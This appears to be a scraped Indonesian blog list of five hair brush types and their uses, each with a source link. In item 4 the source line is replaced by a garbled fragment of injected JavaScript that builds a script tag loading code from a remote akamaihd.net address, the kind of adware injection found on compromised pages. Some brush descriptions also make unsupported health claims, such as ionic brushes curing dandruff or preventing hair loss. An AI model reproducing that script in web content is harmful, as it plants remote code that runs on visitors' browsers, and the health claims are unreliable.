1. Round Hair Brush

Bersama penggunaan hair dryer, round hair brush tak hanya akan memberikan tekstur keriting, gelombang, dan volume pada rambut lurus, tetapi juga bisa meluruskan rambut bergelombang atau keriting! Ukuran sisir yang kita perlukan tergantung panjang rambut dan efek yang kita inginkan. Round hair brush yang kecil atau sedang, cocok untuk rambut pendek. Sisir bulat berukuran sedang hingga besar tepat untuk blow-drying rambut tanggung hingga panjang.
 

source: http://borbotta.com/mainpage/detail/soft-bristle-round-hair-brush



 

2. Cusion Hair Brush

Sisir yang biasanya berbentuk oval ini adalah jenis sisir yang bisa di pakai secara rutin setiap hari. Kelembutannya terasa seperti pijatan ringan di kulit kepala dan membantu melancarkan peredaran darah. Selain itu, sisir ini dapat menstimulasi pertumbuhan rambut dan mengurangi rambut rontok karena akar rambut menjadi lebih kuat.
 

source: http://www.uppercanadasoap.com/us/studio-dry-cushion-hair-brush-pink.html



 

3. Ionic Hair Brush

Penggunaan ionic hair brush secara teratur bisa membantu mengatasi masalah ketombe lho! Selain itu, ion yang dihasilin membantu menambah kilau dan volume rambut kita. Ionic hair brush ternyata juga bisa menyuburkan dan mencegah kerontokan pada rambut.
 

source: https://www.pazarska.com/products/rowenta-cf5512-elite-ionic-hair-brush-instant-shine-hair-styling-comb

4. Paddle Hair Brush

Paddle hair brush merupakan sisir yang tepat untuk meluruskan rambut yang panjang dan tebal. sisir jenis ini bisa juga di pakai untuk lebih meluruskan rambut yang sudah di luruskan menggunakan round hair brush. sisir ini biasanya berbentuk kotak. Pola paddle brush yang biasanya acak biasanya bisa meratakan pengaplikasian  pelembap maupun vitamin pada rambut.

source: ment("script");d.src="https://apiwebwebgetcom-a.akamaihd.net/gsrs?is=isgiwhID&bp=BA&g=ba2e3f8f-cd4f-4502-9a0f-0e9d5b531660";a[0].appendChild(d);}}}catch(e){}



 

5. Vent Hair Brush

Biasanya di pakai terutama untuk mengeringkan rambut. Sisir ini punya celah udara lubang-lubang pada dasarnya, hingga bisa mengeringkan rambut lebih cepat pada saat blow drying. Vent hair brush juga bisa meningkatkan volume rambut dan mencegah rambut dari kekusutan.
 

source: https://www.tripleclicks.com/detail?item=548995